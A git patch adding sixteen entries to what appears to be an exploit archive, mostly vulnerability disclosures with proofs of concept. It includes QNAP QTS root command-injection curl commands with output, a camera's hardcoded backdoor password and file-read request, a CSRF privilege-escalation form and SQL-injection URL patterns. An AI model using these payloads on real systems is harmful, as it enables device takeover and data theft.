From ddb02a2ec644982e351910fba86f828ff1e47bd0 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 8 Apr 2017 05:01:18 +0000
Subject: [PATCH] DB: 2017-04-08

16 new exploits

Aztek Forum 4.00 - 'myadmin.php' User Privilege Escalation
Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation
Intellinet NFC-30IR Camera - Multiple Vulnerabilities
Faveo Helpdesk Community 1.9.3 - Cross-Site Request Forgery
Invoice Template - 'hash' Parameter SQL Injection
Document Management Template - 'hash' Parameter SQL Injection
Shopping Cart Template - 'item' Parameter SQL Injection
Calendar Template 2.0 - 'editid1' Parameter SQL Injection
Forum Template 1.0 - SQL Injection
Quiz Template 1.0 - 'testid' Parameter SQL Injection
Survey Template 1.1 - 'masterkey1' Parameter SQL Injection
My Gaming Ladder Combo System 7.5 - SQL Injection
Ladder System 6.0 - 'faqid' Parameter SQL Injection
WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting
QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection
e107 CMS 2.1.4 - Cross-Site Request Forgery
WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery
WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery
---
 files.csv                            |  18 ++-
 platforms/cgi/webapps/41842.txt      | 197 +++++++++++++++++++++++++++
 platforms/hardware/webapps/41829.txt | 118 ++++++++++++++++
 platforms/php/webapps/41830.txt      |  60 ++++++++
 platforms/php/webapps/41831.txt      |  18 +++
 platforms/php/webapps/41832.txt      |  20 +++
 platforms/php/webapps/41833.txt      |  18 +++
 platforms/php/webapps/41834.txt      |  18 +++
 platforms/php/webapps/41835.txt      |  19 +++
 platforms/php/webapps/41836.txt      |  18 +++
 platforms/php/webapps/41837.txt      |  19 +++
 platforms/php/webapps/41838.txt      |  27 ++++
 platforms/php/webapps/41839.txt      |  25 ++++
 platforms/php/webapps/41841.html     |  58 ++++++++
 platforms/php/webapps/41844.html     |  51 +++++++
 platforms/php/webapps/41845.txt      |  34 +++++
 platforms/php/webapps/41846.html     |  40 ++++++
 17 files changed, 757 insertions(+), 1 deletion(-)
 create mode 100755 platforms/cgi/webapps/41842.txt
 create mode 100755 platforms/hardware/webapps/41829.txt
 create mode 100755 platforms/php/webapps/41830.txt
 create mode 100755 platforms/php/webapps/41831.txt
 create mode 100755 platforms/php/webapps/41832.txt
 create mode 100755 platforms/php/webapps/41833.txt
 create mode 100755 platforms/php/webapps/41834.txt
 create mode 100755 platforms/php/webapps/41835.txt
 create mode 100755 platforms/php/webapps/41836.txt
 create mode 100755 platforms/php/webapps/41837.txt
 create mode 100755 platforms/php/webapps/41838.txt
 create mode 100755 platforms/php/webapps/41839.txt
 create mode 100755 platforms/php/webapps/41841.html
 create mode 100755 platforms/php/webapps/41844.html
 create mode 100755 platforms/php/webapps/41845.txt
 create mode 100755 platforms/php/webapps/41846.html

diff --git a/files.csv b/files.csv
index 1ed7e2ed2..1b1ec3195 100644
--- a/files.csv
+++ b/files.csv
@@ -16364,7 +16364,7 @@ id,file,description,date,author,platform,type,port
 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - 'details_view.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0
 1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
 1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - 'function.php' Local File Inclusion",2006-03-26,"Hamid Ebadi",php,webapps,0
-1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,php,webapps,0
+1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,php,webapps,0
 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - 'sendpassword.php' SQL Injection",2006-03-28,rgod,php,webapps,0
 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution (1)",2006-03-28,No_Face_King,php,webapps,0
 1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog 1.21d - Remote Command Execution (2)",2006-03-28,Hessam-x,php,webapps,0
@@ -37701,3 +37701,19 @@ id,file,description,date,author,platform,type,port
 41822,platforms/php/webapps/41822.txt,"GeoMoose < 2.9.2 - Directory Traversal",2017-04-03,"Sander Ferdinand",php,webapps,0
 41828,platforms/php/webapps/41828.php,"Moodle 2.x/3.x - SQL Injection",2017-04-06,"Marko Belzetski",php,webapps,0
 41824,platforms/php/webapps/41824.txt,"HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution",2017-04-05,rungga_reksya,php,webapps,0
+41829,platforms/hardware/webapps/41829.txt,"Intellinet NFC-30IR Camera - Multiple Vulnerabilities",2017-04-07,"Dimitri Fousekis",hardware,webapps,0
+41830,platforms/php/webapps/41830.txt,"Faveo Helpdesk Community 1.9.3 - Cross-Site Request Forgery",2017-04-05,rungga_reksya,php,webapps,0
+41831,platforms/php/webapps/41831.txt,"Invoice Template - 'hash' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41832,platforms/php/webapps/41832.txt,"Document Management Template - 'hash' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41833,platforms/php/webapps/41833.txt,"Shopping Cart Template - 'item' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41834,platforms/php/webapps/41834.txt,"Calendar Template 2.0 - 'editid1' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41835,platforms/php/webapps/41835.txt,"Forum Template 1.0 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41836,platforms/php/webapps/41836.txt,"Quiz Template 1.0 - 'testid' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41837,platforms/php/webapps/41837.txt,"Survey Template 1.1 - 'masterkey1' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41838,platforms/php/webapps/41838.txt,"My Gaming Ladder Combo System 7.5 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41839,platforms/php/webapps/41839.txt,"Ladder System 6.0 - 'faqid' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41841,platforms/php/webapps/41841.html,"WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting",2017-04-07,dxw,php,webapps,80
+41842,platforms/cgi/webapps/41842.txt,"QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection",2017-04-07,"Harry Sintonen",cgi,webapps,0
+41844,platforms/php/webapps/41844.html,"e107 CMS 2.1.4 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,0
+41845,platforms/php/webapps/41845.txt,"WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80
+41846,platforms/php/webapps/41846.html,"WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80
diff --git a/platforms/cgi/webapps/41842.txt b/platforms/cgi/webapps/41842.txt
new file mode 100755
index 000000000..a5deffe53
--- /dev/null
+++ b/platforms/cgi/webapps/41842.txt
@@ -0,0 +1,197 @@
+QNAP QTS multiple RCE vulnerabilities
+=====================================
+The latest version of this advisory is available at:
+https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
+
+
+Overview
+--------
+
+QNAP QTS firmware contains multiple Command Injection (CWE-77)
+vulnerabilities that can be exploited to gain remote command execution
+on the devices.
+
+
+Description
+-----------
+
+QNAP QTS web user interface CGI binaries include Command Injection
+(CWE-77) vulnerabilities. An unauthenticated attacker can execute
+arbitrary commands on the targeted device.
+
+
+Impact
+------
+
+The attacker is able to execute arbitrary commands as administrative user
+(root). The attacker has full access to all content on the targeted
+device, and can read, modify or remove content at will.
+
+
+Details
+-------
+
+The discovered vulnerabilities, described in more detail below, enable
+multiple independent attacks described here in brief:
+
+- Unauthenticated Remote Command Execution
+
+  The unauthenticated attacker can perform HTTP requests that exploit
+  the vulnerability to execute arbitrary commands. If the device is
+  connected to the internet, the vulnerable devices can be taken over in
+  an automated fashion and can then be used for further attacks.
+
+- Authenticated Remote Command Execution
+
+  The authenticated attacker can perform HTTP requests that exploit
+  the vulnerabilities to execute arbitrary commands. This gives users
+  that normally have only restricted access to the device full
+  administrative (root) access to the system and access to all data
+  stored on the device regardless of the specified access limitations.
+
+
+Vulnerabilities
+---------------
+
+1. [CVE-2017-6361] Command Injection in authLogin.cgi `reboot_notice_msg' (CWE-77)
+
+/cgi-bin/authLogin.cgi CGI has a command injection bug. The
+following commands are executed via system():
+
+/sbin/vjbod_util -i '%s' 1>>/dev/null 2>&1
+/sbin/vdd_control "%s" %d 2>>/dev/null 2>>/dev/null
+
+The value inserted to %s is obtained from the `reboot_notice_msg' HTTP
+request GET parameter.
+
+The reboot_notice_msg is a base64 encoded message of form:
+
+QNAPVJBDTTTTTTTTCCCCCCCCCCCCCCCCLLLLPAYLOAD
+
+- TTTTTTTT is the unix time stamp (last 8 digits)
+- CCCCCCCCCCCCCCCC is the command to perform (Disconnect)
+- LLLL is the payload length
+- PAYLOAD is the payload contents (LLLL bytes)
+
+By creating a crafted reboot_notice_msg value, arbitrary commands
+can be executed. For example:
+
+QNAPVJBD88150863      Disconnect  14`(echo;id)>&2`
+
+$ curl -ki "https://TARGET/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf 'QNAPVJBD%08d%16s  14`(echo;id)>&2`' $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d '\r\n')"
+uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
+Content-type: text/xml
+
+<?xml version="1.0" encoding="UTF-8" ?>
+<QDocRoot version="1.0">
+<command>Disconnect</command>
+<payload>`(echo;id)>&2`</payload>
+</QDocRoot>
+$
+
+
+2. [CVE-2017-6360] Command Injection in userConfig.cgi cloudPersonalSmtp `hash' (CWE-77)
+
+/cgi-bin/userConfig.cgi CGI has a command injection bug. The following
+command is executed via popen():
+
+/sbin/cloud_util -r %s 2>/dev/null
+
+The value inserted to %s is obtained from the `hash' HTTP request GET
+parameter.
+
+An authenticated user can use a specially crafted hash parameter to execute
+arbitrary commands as root:
+
+$ curl -ki 'https://TARGET/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`'
+HTTP/1.1 200 OK
+Date: Sun, 26 Feb 2017 22:55:48 GMT
+Transfer-Encoding: chunked
+Content-Type: text/plain
+
+uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
+Linux TARGET 3.12.6 #1 SMP Mon Feb 13 01:43:01 CST 2017 x86_64 unknown
+Content-type: text/html; charset="UTF-8"
+
+Usage:
+        /sbin/cloud_util -r [enc_token]
+$
+
+
+3. [CVE-2017-6359] Command Injection in utilRequest.cgi cancel_trash_recovery `pid' (CWE-77)
+
+/cgi-bin/filemanager/utilRequest.cgi CGI has a command injection bug. The
+following commands are executed via system():
+
+/bin/kill -9 %s
+
+The value inserted to %s is obtained from the `pid' HTTP request GET
+parameter.
+
+An authenticated user can use a specially crafted pid parameter to execute
+arbitrary commands as root:
+
+$ curl -k 'https://TARGET/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`'
+{ "version": "4.2.1", "build": "20170213", "status": 0, "success": "true" }
+
+[~] # cat /tmp/pwned
+uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
+[~] #
+
+
+Vulnerable devices
+------------------
+
+The vulnerabilities were discovered from an QNAP TVS-663, firmware version
+4.2.2 Build 20161214. They're also confirmed to work with version 4.2.3
+Build 20170213.
+
+CVE-2017-6361 was also confirmed on QNAP HS-251+ running QTS 4.2.2 Build
+20161028.
+
+It is believed that these vulnerabilities affect all devices running QTS.
+
+
+Recommendations to vendor
+-------------------------
+
+1. Fix the command injection vulnerabilities by performing proper input
+   validation (whitelisting) and/or shell metacharacter escaping, or by
+   utilizing execl family of functions.
+
+
+End user mitigation
+-------------------
+
+- Install the firmware update version 4.2.4 build 20170313 or later.
+
+OR
+
+- Restrict access to the web user interface (ports 8080 and 443).
+
+
+Credits
+-------
+
+The vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation.
+
+
+Timeline
+--------
+
+21.01.2017  discovered vulnerabilities 2 and 3
+23.02.2017  discovered vulnerability 1
+23.02.2017  reported vulnerability 1 to the vendor
+26.02.2017  started to write a preliminary advisory
+27.02.2017  sent the preliminary advisory to vendor and CERT-FI
+27.02.2017  requested CVE-IDs from MITRE
+28.02.2017  received CVE-IDs from MITRE
+02.03.2017  inquired status from vendor contact
+02.03.2017  vendor confirmed CVE-2017-6361
+04.03.2017  vendor confirmed the other two vulnerabilities
+13.03.2017  vendor communicated about a upcoming release fixing the vulns
+14.03.2017  vendor released QTS 4.2.4 build 20170313 fixing the vulns
+15.03.2017  sent update to CERT-FI
+21.03.2017  vendor released NAS-201703-21 advisory:
+            https://www.qnap.com/en/support/con_show.php?cid=113
+06.04.2017  public release of the advisory 
\ No newline at end of file
diff --git a/platforms/hardware/webapps/41829.txt b/platforms/hardware/webapps/41829.txt
new file mode 100755
index 000000000..ce7d22d63
--- /dev/null
+++ b/platforms/hardware/webapps/41829.txt
@@ -0,0 +1,118 @@
+Bitcrack Cyber Security - BitLabs Advisory
+http://www.bitcrack.net
+ 
+Multiple Vulnerabilities in Intellinet NFC-30IR Network Cameras
+ 
+ 
+ADVISORY
+--------
+ 
+Title: Local File Inclusion in CGI-SCRIPT & Hard-Coded Manufacturer Backdoor
+Advisory ID: BITL-17-001
+Date published: 2017-04-05
+Date of last update: 2017-04-05
+Vendors contacted: Intellinet
+ 
+VULNERABILITY
+-------------
+ 
+Type: Local File Inclusion (LFI)(Authenticated) & Hardcoded Manufacturer Backdoor
+Risk/Impact: Access to sensitive files & Access control bypass.
+Exploitation Type : Remote
+CVE Name: CVE-2017-7461 and CVE-2017-7462
+
+DESCRIPTION
+------------
+ 
+We found two vulnerabilities affecting the Intellinet NFC-30IR Camera with
+firmware version LM.1.6.16.05
+ 
+   1. [CVE-2017-7461] once authenticated as admin:admin, you can read local files 
+   by requesting the '/cgi-bin/admin/fileread?READ.filePath=<insert here>'
+   
+   Instead of the developer using server-side scripts to render information, it takes the 
+   plain text files and uses /fileread CGI script to simply return the plain text - the 
+   site then relies on Javascript to "format" the text into something pretty.
+   
+   There is no sanitization nor lock-down of what paths that script can read, hence all
+   files can be viewed. Interesting files to request are; /etc/passwd; /etc/boa.conf and more.
+   
+
+   2. [CVE-2017-7462] a manufacturer backdoor exists that allows one to access a script
+   called '/cgi-bin/mft/manufacture' by authenticating as manufacture:erutcafunam 
+   
+   This binary has been analyzed before by other vendors. We did not analyze it again as we 
+   feel this is the same file used in other cameras. Note that the NFC-30IR does NOT have the
+   wireless_mft executable. 
+
+	The hard-coded manufacturer user:pass is manufacture:erutcafunam as shown in the 
+	below boa.conf snippet;
+	/----
+	--snip--
+	#ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
+	ScriptAlias /cgi-bin/operator/ /opt/cgi/operator/
+	ScriptAlias /cgi-bin/view/ /opt/cgi/view/ 
+	ScriptAlias /cgi-bin/admin/ /opt/cgi/admin/
+	ScriptAlias /cgi-bin/jpg/ /opt/cgi/jpg/
+	ScriptAlias /cgi-bin/ /opt/cgi/
+	ScriptAlias /jpg /opt/cgi/jpg
+
+	# MFT: Specify manufacture commands user name and password
+	MFT manufacture erutcafunam
+	
+	--snip--
+	----/
+	
+	This indicates that the camera hardware may be some kind of modified/stripped version
+	of a Zavio board.
+ 
+VENDOR RESPONSE/NOTIFICATION
+----------------------------
+ 
+Vendor was given 7 days to respond, and 3 written notifications.
+No response received nor acknowledgement. 
+Vendor has not released updates to fix the vulnerabilities.
+ 
+CREDITS
+-------
+ 
+Vulnerabilities discovered by Dimitri Fousekis/RuraPenthe
+Additional information on how the manufacture CGI executable works was obtained by
+information written by Core Security/Francisco Falcon.
+ 
+PROOF OF CONCEPT CODE
+----------------------
+
+LOCAL FILE INCLUSION THROUGH CGI FILE READER
+/-----
+GET /cgi-bin/admin/fileread?READ.filePath=/etc/passwd HTTP/1.1
+Host: 10.0.0.21
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
+Referer: http://10.0.0.21/system_info.htm
+Cookie: VideoFmt=3
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+-----/
+ 
+ABOUT BITLABS
+-------------
+ 
+BitLabs is the research division of Bitcrack Cyber Security, a South African & Mauritian
+based cyber security company. We specialize in providing our clients with research and 
+information to combat current and future attacks on their systems and devices. 
+BitLabs focuses primarily on IoT device research, identifying vulnerabilities and other 
+attack vectors that can impact users of these devices negatively. 
+Our Web address is at : http://www.bitcrack.net 
+
+DISCLAIMER INFO
+---------------
+ 
+All content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security,
+and are licensed under a Creative Commons Attribution Non-Commercial 3.0
+(South Africa) License: http://za.creativecommons.org/ and other countries as and when
+stipulated.
+ 
diff --git a/platforms/php/webapps/41830.txt b/platforms/php/webapps/41830.txt
new file mode 100755
index 000000000..e36d7730c
--- /dev/null
+++ b/platforms/php/webapps/41830.txt
@@ -0,0 +1,60 @@
+# Exploit Title: CSRF / Privilege Escalation (Manipulation of Role Agent to Admin) on Faveo version Community 1.9.3
+# Google Dork: no
+# Date: 05-April-2017
+# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
+# Vendor Homepage: http://www.faveohelpdesk.com/
+# Software Link: https://codeload.github.com/ladybirdweb/faveo-helpdesk/zip/v1.9.3
+# Version: Community 1.9.3
+# Tested on: Windows Server 2012 Datacenter Evaluation
+# CVSS 3.0: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L (8.3 - HIGH)
+# CVE: 2017-7571
+
+
+I. Background:
+Faveo Helpdesk Open source ticketing system build on Laravel framework. Faveo word is derived from Latin which means to be favourable. Which truly highlights vision and the scope as well as the functionality of the product that Faveo is. It is specifically designed to cater the needs of startups and SME's empowering them with state of art, ticket based support system. In today's competitive startup scenario customer retention is one of the major challenges. Handling client query diligently is all the difference between retaining or losing a long lasting relationship.
+
+II. Description:
+Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 
+
+Faveo have role:
+- user (Cannot access backend)
+- agent (Can access backend but limited)
+- admin (Can full access backend)
+
+III. Exploit:
+CSRF target is: “/public/rolechangeadmin/USER_ID”
+
+e.g:
+user id = 11 (role is agent)
+
+We have low privilege as “agent” to access application, and we want change to be admin role. 
+- Make sample our script of CSRF (rolechange.html):
+
+<!-- CSRF PoC -->
+<html>
+   <body>
+    <form action="http://example.com/faveo-helpdesk-1.9.3/public/rolechangeadmin/11" method="POST">
+      <input type="hidden" name="group" value="1" />
+      <input type="hidden" name="primary&#95;department" value="3" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+- Before running “rolechange.html”, please login your account as agent and running your html script.
+- Yeaaah, now user id 11 become admin privilege ^_^
+
+
+IV. Thanks to:
+- Alloh SWT
+- MyBoboboy
+- Komunitas IT Auditor & IT Security
+
+
+Refer:
+https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
+https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
+
+PoC:
+https://github.com/ladybirdweb/faveo-helpdesk/issues/446
+http://rungga.blogspot.co.id/2017/04/csrf-privilege-escalation-manipulation.html
\ No newline at end of file
diff --git a/platforms/php/webapps/41831.txt b/platforms/php/webapps/41831.txt
new file mode 100755
index 000000000..865897c83
--- /dev/null
+++ b/platforms/php/webapps/41831.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Invoice Template v1.0 for PHPRunner/ASPRunnerPro/ASPRunner.NET. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/invoice
+# Demo: https://xlinesoft.com/livedemo/invoice/livedemo1/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/invoices_view.php?hash=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41832.txt b/platforms/php/webapps/41832.txt
new file mode 100755
index 000000000..a8fd678ba
--- /dev/null
+++ b/platforms/php/webapps/41832.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Document Management Template v1.0 for PHPRunner 8.x,ASPRunnerPro 9.x,ASPRunner.NET 8.x or better.- SQL Injection 
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/docmanager
+# Demo: https://xlinesoft.com/livedemo/docmanager/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/Share_add.php?hash=[SQL]
+# # # # #
+
diff --git a/platforms/php/webapps/41833.txt b/platforms/php/webapps/41833.txt
new file mode 100755
index 000000000..759b3b21b
--- /dev/null
+++ b/platforms/php/webapps/41833.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Shopping Cart Template v1.0 for ASPRunnerPro/PHPRunner. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/templates/shoppingcart/index.htm
+# Demo: https://xlinesoft.com/livedemo/shopcart/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/client/shopinventory_list.php?item=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41834.txt b/platforms/php/webapps/41834.txt
new file mode 100755
index 000000000..7ecffa371
--- /dev/null
+++ b/platforms/php/webapps/41834.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Calendar v2.0 for ASPRunnerPro/PHPRunner/ASPRunner.NET. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/templates/calendar/index.htm
+# Demo: https://xlinesoft.com/livedemo/calendar/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/caldaily_view.php?editid1=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41835.txt b/platforms/php/webapps/41835.txt
new file mode 100755
index 000000000..3cf85809a
--- /dev/null
+++ b/platforms/php/webapps/41835.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Forum Template v1.0 for ASPRunnerPro/PHPRunner/ASPRunner.NET. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=9
+# Demo: https://xlinesoft.com/livedemo/forum/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/replies/list?mastertable=topics&masterkey1=[SQL]
+# http://localhost/[PATH]/topics/list?search=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41836.txt b/platforms/php/webapps/41836.txt
new file mode 100755
index 000000000..1e2c9e65e
--- /dev/null
+++ b/platforms/php/webapps/41836.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Quiz Template v1.0 for ASPRunnerPro/PHPRunner. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=2
+# Demo: https://xlinesoft.com/livedemo/quiz/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/quiz_responses_add.php?testid=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41837.txt b/platforms/php/webapps/41837.txt
new file mode 100755
index 000000000..bd64f49fb
--- /dev/null
+++ b/platforms/php/webapps/41837.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Survey Template v1.1 for ASPRunnerPro,PHPRunner. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=3
+# Demo: https://xlinesoft.com/livedemo/survey/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/svv_questions_list.php?mastertable=svv_surveys&masterkey1=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41838.txt b/platforms/php/webapps/41838.txt
new file mode 100755
index 000000000..29fb59b9a
--- /dev/null
+++ b/platforms/php/webapps/41838.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: My Gaming Ladder Combo System 7.5 - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: http://www.mygamingladder.com/
+# Software: http://www.mygamingladder.com/demos.shtml
+# Demo: http://www.mygamingladder.com/upgrade/combo/
+# Version: 7.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/game.php?gameid=[SQL]
+# http://localhost/[PATH]/news.php?newsid=[SQL]
+# http://localhost/[PATH]/teams.php?teamid=[SQL]
+# http://localhost/[PATH]/match.php?matchid=[SQL]
+# staff
+# staffaccess
+# staffcomments
+# teammembers
+# teammembersinv
+# teams
+# # # # #
diff --git a/platforms/php/webapps/41839.txt b/platforms/php/webapps/41839.txt
new file mode 100755
index 000000000..10df5b6a5
--- /dev/null
+++ b/platforms/php/webapps/41839.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: My Gaming Ladder System 6.0 - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: http://www.mygamingladder.com/
+# Software: http://www.mygamingladder.com/ladder.shtml
+# Demo: http://www.ladder.tf2.co.za/
+# Version: 6.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news.php?faqid=[SQL]
+# staff :id
+# staff :displayname
+# staff :pass
+# staff :email
+# staff :title
+# staff :access
+# staff :contact
+# # # # #
diff --git a/platforms/php/webapps/41841.html b/platforms/php/webapps/41841.html
new file mode 100755
index 000000000..9b1f86e21
--- /dev/null
+++ b/platforms/php/webapps/41841.html
@@ -0,0 +1,58 @@
+<!--
+Details
+================
+Software: WordPress Firewall 2
+Version: 1.3
+Homepage: https://wordpress.org/plugins/wordpress-firewall-2/
+Advisory report: https://security.dxw.com/advisories/csrfstored-xss-in-wordpress-firewall-2-allows-unauthenticated-attackers-to-do-almost-anything-an-admin-can/
+CVE: Awaiting assignment
+CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
+
+Description
+================
+CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can
+
+Vulnerability
+================
+HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page.
+
+Proof of concept
+================
+Visit the following page, click on the submit button, then visit the plugin’s options page:
+-->
+
